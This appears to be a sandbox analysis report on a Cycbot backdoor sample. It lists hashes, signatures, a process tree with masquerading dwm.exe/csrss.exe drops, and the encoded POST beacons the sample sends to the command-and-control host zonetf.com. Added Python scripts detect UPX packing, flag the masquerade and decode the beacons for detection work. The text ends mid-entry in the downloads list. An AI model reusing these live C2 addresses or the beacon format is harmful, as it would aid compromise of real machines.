Analysis

  • max time kernel
    140s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    14/01/2025, 23:16 UTC

General

  • Target

    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe

  • Size

    155KB

  • MD5

    479ea8b11346420de25822a11bcd87f6

  • SHA1

    ac90a938fd1e3433167f7ebbed91093433299d0d

  • SHA256

    6f617912ffd5ebe4c38bd0b94ddc8d068f87f576ffcc5f806bf5c17b43996a3b

  • SHA512

    f7726abf85d180b1101d6f91735a878ba8102ac66da87f9324b53fa6f6b22b41b86071ec78f19ae3c55a8af954b8f417f7a1773946a3c9450ddafc90cea13587

  • SSDEEP

    3072:6pfbUSOAOmhjliEjsbT0771y3cE7dxNHinaYnodyJXw8XYrwclwEBm:KROAO9Ejc871WdTHinaEoOFXYrwr8m

Malware Config

Signatures

  • Cycbot

    Cycbot is a backdoor and trojan written in C++.

  • Cycbot family
  • Detects Cycbot payload (5 IoCs)

    Cycbot is a backdoor and trojan written in C++.

  • Reads user/profile data of web browsers (3 TTPs)

    Infostealers often target stored browser data, which can include saved credentials and other sensitive account data.

  • Adds Run key to start application (2 TTPs, 1 IoC)
  • UPX packed file (7 IoCs)

    Detects executables packed with UPX or a modified build of the UPX open-source packer.

  • System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • Suspicious use of WriteProcessMemory (8 IoCs)
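The "UPX packed file" signature above keys on markers a stock UPX build leaves in the PE. The following is an added example, not the sandbox's own rule and not code from this report: it walks the section table for names beginning with UPX and scans for the "UPX!" marker string, and it builds a constructed minimal PE header so it can be run offline. A modified UPX that only renames the sections usually still leaves the marker; a build that strips both defeats this check, and the next step is section entropy or unpacking under a debugger.

```python
"""
Cheap UPX indicators for a PE file: section names UPX0/UPX1 and the "UPX!"
marker. Added triage example; the minimal PE used for testing is constructed
here and is not a real binary.
"""
import struct

COFF_HEADER = "<HHIIIHH"   # Machine, NumberOfSections, TimeDateStamp,
                           # PointerToSymbolTable, NumberOfSymbols,
                           # SizeOfOptionalHeader, Characteristics
SECTION_HEADER_SIZE = 40   # IMAGE_SECTION_HEADER


def pe_section_names(data: bytes) -> list[str]:
    """Return the section names of a PE image, or raise ValueError if it is not one."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (_machine, n_sections, _ts, _symtab, _nsyms,
     opt_size, _chars) = struct.unpack_from(COFF_HEADER, data, coff)
    table = coff + struct.calcsize(COFF_HEADER) + opt_size
    names = []
    for i in range(n_sections):
        off = table + SECTION_HEADER_SIZE * i
        raw = data[off:off + 8]           # Name is the first 8 bytes, NUL padded
        if len(raw) < 8:
            raise ValueError("truncated section table")
        names.append(raw.split(b"\0", 1)[0].decode("ascii", "replace"))
    return names


def upx_indicators(data: bytes) -> dict:
    """Both indicators the signature family looks for, reported separately."""
    names = pe_section_names(data)
    return {
        "sections": names,
        "upx_section_names": any(n.startswith("UPX") for n in names),
        "upx_marker": b"UPX!" in data,    # l_magic written by stock UPX
    }


def looks_upx_packed(data: bytes) -> bool:
    """True if either indicator is present (renamed sections alone do not evade it)."""
    ind = upx_indicators(data)
    return ind["upx_section_names"] or ind["upx_marker"]


def build_min_pe(section_names: list[str], extra: bytes = b"") -> bytes:
    """Constructed, headers-only PE for offline testing (assumption: no optional header)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew -> right after DOS header
    coff = struct.pack(COFF_HEADER, 0x14C, len(section_names), 0, 0, 0, 0, 0x0102)
    sections = b"".join(n.encode("ascii").ljust(8, b"\0") + bytes(32)
                        for n in section_names)
    return bytes(dos) + b"PE\0\0" + coff + sections + extra


if __name__ == "__main__":
    sample = build_min_pe(["UPX0", "UPX1", ".rsrc"], b"\0UPX!\0")
    print(upx_indicators(sample), looks_upx_packed(sample))
```

To use it on a real file, read it with `open(path, "rb").read()` and pass the bytes to `upx_indicators`; the dictionary tells you which of the two indicators fired, which matters when deciding whether plain `upx -d` is worth trying.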

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe (PID 2376)
    Command line: "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe"
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    • Child: C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe (PID 2080)
      Command line: C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe startC:\Users\Admin\AppData\Roaming\dwm.exe%C:\Users\Admin\AppData\Roaming
      • System Location Discovery: System Language Discovery
    • Child: C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe (PID 624)
      Command line: C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe startC:\Users\Admin\AppData\Local\Temp\csrss.exe%C:\Users\Admin\AppData\Local\Temp
      • System Location Discovery: System Language Discovery

    Note: both children are the same image relaunched with a start<file>%<directory> argument, and the file named in each case (dwm.exe, csrss.exe) carries the name of a core Windows process but sits under a user-writable directory.
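The two child command lines share one layout, start<target file>%<target directory>, and both targets borrow a Windows system-process name under a user-writable path. The following added example, which is not code from the report or from the sample, parses that layout and flags the masquerading target; the allow-list of system binary names and the list of user-writable roots are triage assumptions, not something the report states.

```python
"""
Parse the "<image> start<target file>%<target dir>" relaunch command line seen
in the process tree and flag system-binary names dropped outside %SystemRoot%.
Added example; SYSTEM_BINARY_NAMES and USER_WRITABLE_ROOTS are assumptions.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Optional

# Names Windows ships only under %SystemRoot% (assumption: a short triage list).
SYSTEM_BINARY_NAMES = {"dwm.exe", "csrss.exe", "svchost.exe", "lsass.exe",
                       "winlogon.exe", "explorer.exe", "services.exe"}
# Folder fragments where a copy of such a name is not expected (assumption).
USER_WRITABLE_ROOTS = (r"\appdata\roaming", r"\appdata\local\temp",
                       r"\appdata\local", r"\users\public")

# <image> may be quoted or bare; the argument starts with the literal "start".
_CMD = re.compile(r'^(?:"(?P<qimage>[^"]+)"|(?P<image>\S+))\s+start(?P<rest>.+)$')


@dataclass
class Relaunch:
    image: str
    target_path: str
    target_dir: str
    masquerade: bool


def is_masquerade(path: str) -> bool:
    """True when a system-binary file name is placed in a user-writable folder."""
    name = ntpath.basename(path).lower()
    folder = ntpath.dirname(path).lower()
    return name in SYSTEM_BINARY_NAMES and any(r in folder for r in USER_WRITABLE_ROOTS)


def parse_relaunch(cmdline: str) -> Optional[Relaunch]:
    """Return a Relaunch for a matching command line, None for anything else."""
    m = _CMD.match(cmdline.strip())
    if not m:
        return None
    image = m.group("qimage") or m.group("image")
    rest = m.group("rest")
    if "%" not in rest:
        return None
    # Observed layout is <file>%<directory>; split on the last '%' so a stray
    # '%' inside the file name would not break the directory part.
    target_path, target_dir = rest.rsplit("%", 1)
    return Relaunch(image, target_path, target_dir, is_masquerade(target_path))


if __name__ == "__main__":
    # The two child command lines recorded in the process tree of this report.
    observed = [
        r"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe "
        r"startC:\Users\Admin\AppData\Roaming\dwm.exe%C:\Users\Admin\AppData\Roaming",
        r"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe "
        r"startC:\Users\Admin\AppData\Local\Temp\csrss.exe%C:\Users\Admin\AppData\Local\Temp",
    ]
    for line in observed:
        print(parse_relaunch(line))
```

The same parser can be pointed at Sysmon event ID 1 or EDR process-creation telemetry; a hit on `masquerade` together with a parent and child sharing the same image path is a tight signal for this dropper behaviour.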

Network

  • DNS (remote: US)
    onlinedatingsecretfriends.com
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address: 8.8.8.8:53
    Request: onlinedatingsecretfriends.com IN A
    Response: no records listed
  • DNS (remote: US)
    searchmobilecode.com
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address: 8.8.8.8:53
    Request: searchmobilecode.com IN A
    Response: no records listed
  • DNS (remote: US)
    zonetf.com
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address: 8.8.8.8:53
    Request: zonetf.com IN A
    Response: zonetf.com IN A 76.223.54.146; zonetf.com IN A 13.248.169.48
  • DNS (remote: US)
    zonetf.com
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address: 8.8.8.8:53
    Request: zonetf.com IN A
    Response: zonetf.com IN A 76.223.54.146; zonetf.com IN A 13.248.169.48
  • DNS (remote: US)
    extremerollerclub.com
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address: 8.8.8.8:53
    Request: extremerollerclub.com IN A
    Response: no records listed
  • POST (remote: US)
    http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    76.223.54.146:80
    Request
    POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
    Host: zonetf.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 0
    Connection: close
    Response
    HTTP/1.1 405 Method Not Allowed
    content-length: 0
    connection: close
  • POST (remote: US)
    http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    76.223.54.146:80
    Request
    POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
    Host: zonetf.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 0
    Connection: close
    Response
    HTTP/1.1 405 Method Not Allowed
    content-length: 0
    connection: close
  • POST (remote: US)
    http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    76.223.54.146:80
    Request
    POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D HTTP/1.1
    Host: zonetf.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 0
    Connection: close
    Response
    HTTP/1.1 405 Method Not Allowed
    content-length: 0
    connection: close
  • POST (remote: US)
    http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2Bsq1Sr%2Fe%2BV5ZuRg%3D%3D
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    76.223.54.146:80
    Request
    POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2Bsq1Sr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
    Host: zonetf.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 0
    Connection: close
    Response
    HTTP/1.1 405 Method Not Allowed
    content-length: 0
    connection: close
  • POST (remote: US)
    http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8CiYvEaSvT%2Bsqli8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    76.223.54.146:80
    Request
    POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8CiYvEaSvT%2Bsqli8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
    Host: zonetf.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 0
    Connection: close
    Response
    HTTP/1.1 405 Method Not Allowed
    content-length: 0
    connection: close
  • DNS (remote: US)
    www.google.com
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address: 8.8.8.8:53
    Request: www.google.com IN A
    Response: www.google.com IN A 142.250.187.196
  • GET (remote: GB; the request to www.google.com is most likely a connectivity check by the sample, and the /sorry/ redirect it receives is Google's automated-traffic challenge page, not content controlled by the sample's operators)
    http://www.google.com/
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    142.250.187.196:80
    Request
    GET / HTTP/1.0
    Connection: close
    Host: www.google.com
    Accept: */*
    Response
    HTTP/1.0 302 Found
    Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGKnhm7wGIjAX66p0pAtsapVV56LvnKh0prmP57wTozh0EyKtXm5HGWLPSL9qVaM2F9oGf8CSUpkyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    x-hallmonitor-challenge: CgwIqeGbvAYQy4r9zQMSBLXXsFM
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-3BrZTL7tnud9wHxZXfFO-A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
    Date: Tue, 14 Jan 2025 23:18:01 GMT
    Server: gws
    Content-Length: 396
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Set-Cookie: AEC=AZ6Zc-VVCM62OsYGdPK1p9EYYRdUQBikLXZxSNNIeJcJh4Eq3uhGflhmTg; expires=Sun, 13-Jul-2025 23:18:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
  • DNS (remote: US)
    hostinganddedic.com
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address: 8.8.8.8:53
    Request: hostinganddedic.com IN A
    Response: no records listed
  • GET (remote: GB)
    http://www.google.com/
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    142.250.187.196:80
    Request
    GET / HTTP/1.1
    Connection: close
    Pragma: no-cache
    Host: www.google.com
    Response
    HTTP/1.1 302 Found
    Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGKrhm7wGIjAD9f3ziWVBbZXm3dwQZYFN9l0sbrFDWEBEpiY_8Z9sZ0uj8jT_GrL4LNgDodsKZV4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    x-hallmonitor-challenge: CgwIquGbvAYQxJuBygESBLXXsFM
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-CxCAaOmDt3QbncaDKu3pIg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
    Date: Tue, 14 Jan 2025 23:18:02 GMT
    Server: gws
    Content-Length: 396
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Set-Cookie: AEC=AZ6Zc-XvMjDvxONR28PNcfRGOFGe6OkeQFeLCx7_1VAHu5YLOzGjI7d_wA; expires=Sun, 13-Jul-2025 23:18:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
    Connection: close
  • GET (remote: GB)
    http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGKrhm7wGIjAD9f3ziWVBbZXm3dwQZYFN9l0sbrFDWEBEpiY_8Z9sZ0uj8jT_GrL4LNgDodsKZV4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe
    Remote address:
    142.250.187.196:80
    Request
    GET /sorry/index?continue=http://www.google.com/&q=EgS117BTGKrhm7wGIjAD9f3ziWVBbZXm3dwQZYFN9l0sbrFDWEBEpiY_8Z9sZ0uj8jT_GrL4LNgDodsKZV4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
    Connection: close
    Pragma: no-cache
    Host: www.google.com
    Response
    HTTP/1.1 429 Too Many Requests
    Date: Tue, 14 Jan 2025 23:18:02 GMT
    Pragma: no-cache
    Expires: Fri, 01 Jan 1990 00:00:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Content-Type: text/html
    Server: HTTP server (unknown)
    Content-Length: 3075
    X-XSS-Protection: 0
    Connection: close
  Connections (bytes sent / received and packets out / in are per connection; the process is JaffaCakes118_479ea8b11346420de25822a11bcd87f6.exe in every row):

  • 76.223.54.146:80 (http)
    Sent 581 B / received 245 B; packets 5 out / 4 in
    POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
    Response: 405
  • 76.223.54.146:80 (http)
    Sent 581 B / received 245 B; packets 5 out / 4 in
    POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
    Response: 405
  • 76.223.54.146:80 (http)
    Sent 609 B / received 325 B; packets 6 out / 6 in
    POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
    Response: 405
  • 76.223.54.146:80 (http)
    Sent 627 B / received 325 B; packets 6 out / 6 in
    POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2Bsq1Sr%2Fe%2BV5ZuRg%3D%3D
    Response: 405
  • 76.223.54.146:80 (http)
    Sent 641 B / received 245 B; packets 6 out / 4 in
    POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8CiYvEaSvT%2Bsqli8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
    Response: 405
  • 142.250.187.196:80 (http)
    Sent 348 B / received 1.5kB; packets 6 out / 5 in
    GET http://www.google.com/
    Response: 302
  • 127.0.0.1:62263 (loopback connection; no protocol details recorded)
  • 142.250.187.196:80 (http)
    Sent 307 B / received 1.5kB; packets 5 out / 5 in
    GET http://www.google.com/
    Response: 302
  • 142.250.187.196:80 (http)
    Sent 526 B / received 3.7kB; packets 6 out / 7 in
    GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGKrhm7wGIjAD9f3ziWVBbZXm3dwQZYFN9l0sbrFDWEBEpiY_8Z9sZ0uj8jT_GrL4LNgDodsKZV4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    Response: 429
  • 127.0.0.1:62263 (loopback connection; no protocol details recorded)
  • 8.8.8.8:53 (dns)
    Sent 75 B / received 75 B; packets 1 out / 1 in
    DNS request: onlinedatingsecretfriends.com (no response records listed)
  • 8.8.8.8:53 (dns)
    Sent 66 B / received 139 B; packets 1 out / 1 in
    DNS request: searchmobilecode.com (no response records listed)
  • 8.8.8.8:53 (dns)
    Sent 56 B / received 88 B; packets 1 out / 1 in
    DNS request: zonetf.com
    DNS response: 76.223.54.146, 13.248.169.48
  • 8.8.8.8:53 (dns)
    Sent 56 B / received 88 B; packets 1 out / 1 in
    DNS request: zonetf.com
    DNS response: 76.223.54.146, 13.248.169.48
  • 8.8.8.8:53 (dns)
    Sent 67 B / received 140 B; packets 1 out / 1 in
    DNS request: extremerollerclub.com (no response records listed)
  • 8.8.8.8:53 (dns)
    Sent 60 B / received 76 B; packets 1 out / 1 in
    DNS request: www.google.com
    DNS response: 142.250.187.196
  • 8.8.8.8:53 (dns)
    Sent 65 B / received 138 B; packets 1 out / 1 in
    DNS request: hostinganddedic.com (no response records listed)

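A first pass over the five zonetf.com check-ins recorded above: the tq parameter is %-encoded base64, and decoding the five values and comparing them shows how much of each beacon is fixed and how much varies. This is an added example, not part of the sandbox report; the URLs are copied from the entries above, and the reading of the result in the closing comment is an analyst inference that the report itself does not make. The 405 responses show that the host now at 76.223.54.146 does not accept POST to that path, so the domain is most likely no longer serving the original panel.

```python
"""
Decode the tq beacon parameter of the five zonetf.com POSTs and measure the
fixed prefix and suffix across them. Added triage example; the inference in
the __main__ comment is the analyst's, not the report's.
"""
import base64
from urllib.parse import unquote, urlsplit

# The five POST URLs recorded in the report, copied verbatim.
BEACON_URLS = [
    "http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D",
    "http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D",
    "http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D",
    "http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2Bsq1Sr%2Fe%2BV5ZuRg%3D%3D",
    "http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGs7kI6333PyGT7iisSoBvVkSOf%2F0alxtygbpb6HvnSAOQij%2B8CiYvEaSvT%2Bsqli8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D",
]


def extract_tq(url: str) -> bytes:
    """Return the raw bytes carried in the tq parameter (still encrypted)."""
    for field in urlsplit(url).query.split("&"):
        key, _, value = field.partition("=")
        if key == "tq":
            # The value is %-encoded base64: +, / and = appear as %2B, %2F, %3D.
            return base64.b64decode(unquote(value), validate=True)
    raise ValueError("no tq parameter in URL")


def common_prefix_len(blobs: list[bytes]) -> int:
    """Number of leading bytes shared by every blob."""
    n = 0
    for column in zip(*blobs):
        if len(set(column)) != 1:
            break
        n += 1
    return n


def common_suffix_len(blobs: list[bytes]) -> int:
    """Number of trailing bytes shared by every blob."""
    return common_prefix_len([b[::-1] for b in blobs])


def beacon_summary(urls: list[str]) -> dict:
    """Decoded sizes plus the fixed head and tail shared by all beacons."""
    blobs = [extract_tq(u) for u in urls]
    return {
        "lengths": [len(b) for b in blobs],
        "common_prefix": common_prefix_len(blobs),
        "common_suffix": common_suffix_len(blobs),
    }


if __name__ == "__main__":
    print(beacon_summary(BEACON_URLS))
    # Inference (analyst's, not the report's): a long identical prefix and an
    # identical tail that appears at different offsets mean there is no
    # per-message nonce and the transform is not position-bound like a proper
    # stream cipher; the check-in is a fixed header plus a few variable bytes,
    # which makes the prefix a usable network indicator for this campaign.
```

The prefix length is what you would feed into a Suricata or proxy rule for this specific campaign; the variable tail is where any per-run state lives and is the part worth recovering from memory (the 264KB dumps at 0x400000 listed under Downloads) if the cipher needs to be identified.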
MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Roaming\8264.3A1

    Filesize

    1KB

    MD5

    5c51f593002a6dcc1b630dab9154ca24

    SHA1

    9cd3f31acd7ff3acca132f9aa4563435c1b53868

    SHA256

    8784117ca15b6d0c63e057f3003aa88e2a7ca62dc981a856614b6d82111e76ae

    SHA512

    c896ec1ac8025c02d6bb34b1477e8239500fce8bcde7f633727f113da23366e1e9dea66cfe48000fa565f79a165d788858766cbc5805422418520ea3b83b4f90

  • C:\Users\Admin\AppData\Roaming\8264.3A1

    Filesize

    1KB

    MD5

    4ff11f92482e9ae3b56069f69e0b299f

    SHA1

    fe96dfb674ca339348ea1a69c406f832e970a7d8

    SHA256

    ac6d0c8326efdfe270cfd4fb3da1b0472cfd89d3443777583f242ee0ef0b0fdc

    SHA512

    1723220769f11e42d94cb7ec40dcf9faa109b4888f337106d1c6a3f8adada22a87e04dfd9b1590a3450c48cf8697fd977e45aa6cdb114ebd4b311da3d8e30bb6

  • C:\Users\Admin\AppData\Roaming\8264.3A1

    Filesize

    600B

    MD5

    5f358409ef0005b3c60a004a71447f78

    SHA1

    f4877d50b1c2e9774c5c7a705d0ac46fe1470f28

    SHA256

    cefb78b32558f8f5fbfb6bf3e842f161d68d6177241188a735776f54176bb415

    SHA512

    478e6aeee61adcb05a28e0ad6d1a06374e23641bccc8db5c322cc451f55cb95853ca579bef8d5b2d4e2ad8f3da5e26cc83caa3441d7e3392f07a90227f1e0127

  • C:\Users\Admin\AppData\Roaming\8264.3A1

    Filesize

    996B

    MD5

    1b948209056bc1a51ad2a18875e1f820

    SHA1

